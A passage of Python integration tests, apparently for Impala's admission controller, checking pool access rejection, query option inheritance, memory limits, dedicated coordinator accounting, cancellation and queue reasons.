queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024)
try:
for pool in ['', 'not_a_pool_name']:
expected_error =\
"No mapping found for request from user '\S+' with requested pool '%s'"\
% (pool)
self.__check_pool_rejected(client, pool, expected_error)
# Check rejected if user does not have access.
expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\
"denied access to assigned pool 'root.queueC'"
self.__check_pool_rejected(client, 'root.queueC', expected_error)
# Also try setting a valid pool
client.set_configuration({'request_pool': 'root.queueB'})
result = client.execute("select 1")
# Query should execute in queueB which doesn't have a default mem limit set in the
# llama-site.xml, so it should inherit the value from the default process query
# options.
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB'])
# Try setting the pool for a queue with a very low queue timeout.
# queueA allows only 1 running query and has a queue timeout of 50ms, so the
# second concurrent query should time out quickly.
client.set_configuration({'request_pool': 'root.queueA'})
handle = client.execute_async("select sleep(1000)")
# Wait for query to clear admission control and get accounted for
client.wait_for_admission_control(handle)
self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout")
assert client.get_state(handle) == client.QUERY_STATES['FINISHED']
# queueA has default query options mem_limit=128m,query_timeout_s=5
self.__check_query_options(client.get_runtime_profile(handle),
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA'])
client.close_query(handle)
# Should be able to set query options via the set command (overriding defaults if
# applicable). mem_limit overrides the pool default. abort_on_error has no
# proc/pool default.
client.execute("set mem_limit=31337")
client.execute("set abort_on_error=1")
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5',
'REQUEST_POOL=root.queueA'])
# Should be able to set query options (overriding defaults if applicable) with the
# config overlay sent with the query RPC. mem_limit is a pool-level override and
# max_io_buffers has no proc/pool default.
client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA',
'ABORT_ON_ERROR=1'])
# Once options are reset to their defaults, the queue
# configuration should kick back in. We'll see the
# queue-configured mem_limit, and we won't see
# abort on error, because it's back to being the default.
client.execute('set mem_limit=""')
client.execute('set abort_on_error=""')
client.set_configuration({'request_pool': 'root.queueA'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
[queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5'])
finally:
client.close()
# HS2 tests:
# batch_size is set in the HS2 OpenSession() call via the requires_session() test
# decorator, so that is included in all test cases below.
batch_size = "BATCH_SIZE=100"
# Check HS2 query in queueA gets the correct query options for the pool.
self.__check_hs2_query_opts("root.queueA", None,
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check overriding the mem limit sent in the confOverlay with the query.
self.__check_hs2_query_opts("root.queueA", '12345',
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check HS2 query in queueB gets the process-wide default query options
self.__check_hs2_query_opts("root.queueB", None,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size])
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml",
additional_args="-require_username"),
statestored_args=_STATESTORED_ARGS)
def test_require_user(self):
open_session_req = TCLIService.TOpenSessionReq()
open_session_req.username = ""
open_session_resp = self.hs2_client.OpenSession(open_session_req)
TestAdmissionController.check_response(open_session_resp)
try:
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = open_session_resp.sessionHandle
execute_statement_req.statement = "select count(1) from functional.alltypes"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
self.wait_for_operation_state(execute_statement_resp.operationHandle,
TCLIService.TOperationState.ERROR_STATE)
get_operation_status_resp = self.get_operation_status(
execute_statement_resp.operationHandle)
assert "User must be specified" in get_operation_status_resp.errorMessage
finally:
close_req = TCLIService.TCloseSessionReq()
close_req.sessionHandle = open_session_resp.sessionHandle
TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_trivial_coord_query_limits(self):
"""Tests that trivial coordinator only queries have negligible resource requirements.
"""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Queries with only constant exprs or limit 0 should be admitted.
self.execute_query_expect_success(self.client, "select 1")
self.execute_query_expect_success(self.client,
"select * from functional.alltypes limit 0")
non_trivial_queries = [
"select * from functional.alltypesagg limit 1",
"select * from functional.alltypestiny"]
for query in non_trivial_queries:
ex = self.execute_query_expect_failure(self.client, query)
assert re.search("Rejected query from pool default-pool: request memory needed "
".* is greater than pool max mem resources 10.00 MB", str(ex))
@SkipIfS3.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_memory_rejection(self, vector):
"""Test that rejection of queries based on reservation and estimates works as
expected. The test depends on scanner memory estimates, which different on remote
filesystems with different (synthetic) block sizes."""
# Test that the query will be rejected by admission control if:
# a) the largest per-backend min buffer reservation is larger than the query mem limit
# b) the largest per-backend min buffer reservation is larger than the
# buffer_pool_limit query option
# c) the cluster-wide min-buffer reservation size is larger than the pool memory
# resources.
self.run_test_case('QueryTest/admission-reject-min-reservation', vector)
# Test that queries are rejected based on memory estimates. Set num_nodes=1 to
# avoid unpredictability from scheduling on different backends.
exec_options = vector.get_value('exec_option')
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-reject-mem-estimate', vector)
# Process mem_limit used in test_mem_limit_upper_bound
PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT))
def test_mem_limit_upper_bound(self, vector):
""" Test to ensure that a query is admitted if the requested memory is equal to the
process mem limit"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Setting requested memory equal to process memory limit
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
self.execute_query_expect_success(self.client, query, exec_options)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT),
num_exclusive_coordinators=1)
def test_mem_limit_dedicated_coordinator(self, vector):
"""Regression test for IMPALA-8469: coordinator fragment should be admitted on
dedicated coordinator"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Test both single-node and distributed plans
for num_nodes in [0, 1]:
# Memory just fits in memory limits
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
exec_options['num_nodes'] = num_nodes
self.execute_query_expect_success(self.client, query, exec_options)
# A bit too much memory to run on coordinator.
exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1)
ex = self.execute_query_expect_failure(self.client, query, exec_options)
assert ("Rejected query from pool default-pool: request memory needed "
"1.10 GB is greater than memory available for admission 1.00 GB" in
str(ex)), str(ex)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is different than
the ones on executors."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml")
+ " -use_dedicated_coordinator_estimates false",
num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_legacy_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators with specialized dedicated coord
estimates turned off using a hidden startup param, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is the same
(as expected from legacy behavior)."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_sanity_checks_dedicated_coordinator(self, vector, unique_database):
"""Sanity tests for verifying targeted dedicated coordinator memory estimations and
behavior."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
exec_options = vector.get_value('exec_option')
# Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated
# coord estimates. Without this query option the estimate would be > 100MB.
expected_mem = 60 * (1 << 20) # 60MB
exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# If the query is only scheduled on the coordinator then the mem to admit on executor
# should be zero.
exec_options['NUM_NODES'] = 1
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - 0) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# Make sure query execution works perfectly for a query that does not have any
# fragments schdeuled on the coordinator, but has runtime-filters that need to be
# aggregated at the coordinator.
exec_options = vector.get_value('exec_option')
exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000
query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey
FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders
ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database)
result = self.execute_query_expect_success(self.client, query, exec_options)
assert "Runtime filters: All filters arrived" in result.runtime_profile
def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates):
"""Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies
the actual vs expected values for mem admitted and mem limit for both coord and
executor. Also verifies that those memory values are different if
'using_dedicated_coord_estimates' is true."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
# Use a test query that has unpartitioned non-coordinator fragments to make
# sure those are handled correctly (IMPALA-10036).
for query in [QUERY, QUERY_WITH_UNPARTITIONED_FRAGMENTS]:
handle = self.client.execute_async(query.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
debug_string = " expected_mem_limits:" + str(
expected_mem_limits) + " actual_mem_limits:" + str(
actual_mem_limits) + " mem_admitted:" + str(mem_admitted)
MB = 1 << 20
# Easiest way to check float in-equality.
assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[
'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string
# There may be some rounding errors so keep a margin of 5MB when verifying
assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(actual_mem_limits['executor'] - expected_mem_limits[
'executor']) < 5 * MB, debug_string
assert abs(mem_admitted['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(
mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \
debug_string
# Ensure all fragments finish executing before running next query.
self.client.fetch(query, handle)
self.client.close_query(handle)
def __get_mem_limits_admission_debug_page(self):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem_limit calculated by the admission controller from the impala admission debug page
of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator'
and 'executor' and their respective mem values in bytes."""
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
response_json = self.cluster.impalads[0].service.get_debug_webpage_json("admission")
assert 'resource_pools' in response_json
assert len(response_json['resource_pools']) == 1
assert response_json['resource_pools'][0]['running_queries']
assert len(response_json['resource_pools'][0]['running_queries']) == 1
query_info = response_json['resource_pools'][0]['running_queries'][0]
return {'coordinator': float(query_info["coord_mem_to_admit"]),
'executor': float(query_info["mem_limit"])}
def __get_mem_limits_memz_debug_page(self, query_id):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem limits enforced on the query (identified by the 'query_id') extracted from
mem-tracker's output on the memz debug page of the dedicated coordinator and the
executor impala daemons. Returns a dictionary with the keys 'coordinator' and
'executor' and their respective mem values in bytes."""
metric_name = "Query({0})".format(query_id)
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in
self.cluster.impalads]
return {'coordinator': float(mem_trackers[0]['limit']),
'executor': float(mem_trackers[1]['limit'])}
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_dedicated_coordinator_planner_estimates(self, vector, unique_database):
"""Planner tests to add coverage for coordinator estimates when using dedicated
coordinators. Also includes coverage for verifying cluster memory admitted."""
vector_copy = copy(vector)
exec_options = vector_copy.get_value('exec_option')
# Remove num_nodes from the options to allow test case runner to set it in one of
# the test cases.
del exec_options['num_nodes']
exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible
self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy,
unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1, cluster_size=2)
def test_mem_limit_executors(self, vector, unique_database):
"""Verify that the query option mem_limit_executors is only enforced on the
executors."""
expected_exec_mem_limit = "999999999"
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
self.client.set_configuration({"MEM_LIMIT_EXECUTORS": expected_exec_mem_limit})
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
assert expected_mem_limits['executor'] > expected_mem_limits[
'coordinator'], expected_mem_limits
assert expected_mem_limits['executor'] == float(
expected_exec_mem_limit), expected_mem_limits
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT,
queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS),
start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G",
statestored_args=_STATESTORED_ARGS)
def test_heterogeneous_proc_mem_limit(self, vector):
""" Test to ensure that the admission controller takes into account the actual proc
mem limits of each impalad. Starts a cluster where the last impalad has a smaller
proc mem limit than other impalads and runs queries where admission/rejection decision
depends on the coordinator knowing the other impalad's mem limits.
The queue_wait_timeout_ms has been set to be more than the prioritized statestore
update time, so that the queries don't time out before receiving updates to pool
stats"""
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg, (select 1) B limit 1"
# Successfully run a query with mem limit equal to the lowest process memory among
# impalads
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
self.execute_query_expect_success(self.client, query, exec_options)
# Test that a query scheduled to run on a single node and submitted to the impalad
# with higher proc mem limit succeeds.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
exec_options['num_nodes'] = "1"
self.execute_query_expect_success(self.client, query, exec_options)
# Exercise rejection checks in admission controller.
try:
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
" is greater than memory available for admission 2.00 GB of \S+", str(e)), \
str(e)
# Exercise queuing checks in admission controller.
try:
# Wait for previous queries to finish to avoid flakiness.
for impalad in self.cluster.impalads:
impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
impalad_with_2g_mem.execute_async("select sleep(1000)")
# Wait for statestore update to update the mem admitted in each node.
sleep(STATESTORE_RPC_FREQUENCY_MS / 1000)
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
# Since Queuing is synchronous and we can't close the previous query till this
# returns, we wait for this to timeout instead.
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
"2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
finally:
if impalad_with_2g_mem is not None:
impalad_with_2g_mem.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
statestored_args=_STATESTORED_ARGS)
def test_cancellation(self):
""" Test to confirm that all Async cancellation windows are hit and are able to
succesfully cancel the query"""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
handle = client.execute_async("select 1")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Ready to be Rejected but already cancelled, query id=")
client.clear_configuration()
client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
handle = client.execute_async("select 2")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Ready to be Admitted immediately but already cancelled, query id=")
client.set_configuration_option("debug_action",
"CRS_BEFORE_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 3")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=")
client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 4")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=", 2)
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
client.set_configuration_option("debug_action",
"AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
queued_query_handle = client.execute_async("select 5")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
# Only cancel the queued query, because close will wait till it unregisters, this
# gives us a chance to close the running query and allow the dequeue thread to
# dequeue the queue query
client.cancel(queued_query_handle)
client.close_query(handle)
client.close_query(queued_query_handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile, queued_profile
self.assert_impalad_log_contains('INFO', "Dequeued cancelled query=")
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
queued_query_handle = client.execute_async("select 6")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
client.close_query(queued_query_handle)
client.close_query(handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile
for i in self.cluster.impalads:
i.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.agg-num-running.default-pool") == 0
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.total-admitted.default-pool") == 4
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.total-queued.default-pool") == 2
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_num_queries(self):
"""Test that queue details appear in the profile when queued based on num_queries."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select sleep(1000)"
TIMEOUT_S = 60
EXPECTED_REASON = \
"Latest admission queue reason: number of running queries 1 is at or over limit 1"
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S)
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons if 'number of running queries' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of num_queries: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_memory(self):
"""Test that queue details appear in the profile when queued based on memory."""
# Run a bunch of queries with mem_limit set so that only one can be admitted at a
# time- one should get admitted immediately, the rest should be dequeued one-by-one.
STMT = "select sleep(100)"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\
"available in pool default-pool with max mem resources 10.00 MB. Needed 9.00 MB" \
" but only 1.00 MB was available."
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '9mb'})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail for detail in init_queue_reasons
if 'Not enough aggregate memory available' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of memory: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
def __extract_init_queue_reasons(self, profiles):
"""Return a list of the 'Admission Queue details' strings found in 'profiles'"""
matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles]
return [match.group(0) for match in matches if match is not None]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=2 * 1024 * 1024,
queue_wait_timeout_ms=1000),
statestored_args=_STATESTORED_ARGS)
def test_timeout_reason_host_memory(self):
"""Test that queue details appear in the profile when queued and then timed out
due to a small 2MB host memory limit configuration."""
# Run a bunch of queries with mem_limit set so that only one can be admitted
# immediately. The rest should be queued and dequeued (timeout) due to host memory
# pressure.
STMT = "select sleep(100)"
TIMEOUT_S = 20
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '2mb'}, True)
EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
"""default-pool.*"""\
"""Not enough memory available on host.*"""\
"""Stats for host.*"""\
"""topN_query_stats.*"""\
"""all_query_stats:.*"""
num_reasons = len([profile for profile in profiles
if re.search(EXPECTED_REASON, profile, re.DOTALL)])
assert num_reasons >= 1, \
"At least one query should have been timed out with topN query details: " +\
'\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=2 * 1024 * 1024, proc_mem_limit=20 * 1024 * 1024,
queue_wait_timeout_ms=1000),
statestored_args=_STATESTORED_ARGS)
def test_timeout_reason_pool_memory(self):
"""Test that queue details appear in the profile when queued and then timed out
due to a small 2MB pool memory limit configuration."""
# Run a bunch of queries with mem_limit set so that only one can be admitted
# immediately. The rest should be queued and dequeued (timeout) due to pool memory
# pressure.
STMT = "select sleep(100)"
TIMEOUT_S = 20
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '2mb'}, True)
EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
"""default-pool.*"""\
"""Not enough aggregate memory available in pool default-pool.*"""\
"""Aggregated stats for pool.*"""\
"""topN_query_stats.*"""
num_reasons = len([profile for profile in profiles
if re.search(EXPECTED_REASON, profile, re.DOTALL)])
assert num_reasons >= 1, \
"At least one query should have been timed out with topN query details: " +\
'\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=100, max_queued=10,
pool_max_mem=-1, admission_control_slots=4,
executor_groups="default-pool-group1"),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_slots(self):
"""Test that queue details appear in the profile when queued based on number of
slots."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select min(ss_wholesale_cost) from tpcds_parquet.store_sales"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough admission control " +\
"slots available on host"
NUM_QUERIES = 5
coordinator_limited_metric = \
"admission-controller.total-dequeue-failed-coordinator-limited"
original_metric_value = self.get_metric(coordinator_limited_metric)
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, config_options={"mt_dop": 4})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons
if "Not enough admission control slots available on host" in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of slots: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
# Confirm that the cluster quiesces and all metrics return to zero.
for impalad in self.cluster.impalads:
verifier = MetricVerifier(impalad.service)
verifier.wait_for_backend_admission_control_state()
# The number of admission control slots on the coordinator is limited
# so the failures to dequeue should trigger a bump in the coordinator_limited_metric.
later_metric_value = self.get_metric(coordinator_limited_metric)
assert later_metric_value > original_metric_value, \
"Metric %s did not change" % coordinator_limited_metric
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_query_locations_correctness(self, vector):
"""Regression test for IMPALA-7516: Test to make sure query locations and in-flight
queries are correct for different admission results that can affect it."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1"
# Case 1: When a query runs succesfully.
handle = self.client.execute_async(query)
self.__assert_num_queries_accounted(1)
self.close_query(handle)
self.__assert_num_queries_accounted(0)
# Case 2: When a query is queued then cancelled
handle_running = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_running)
handle_queued = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_queued)
self.impalad_test_service.wait_for_metric_value(
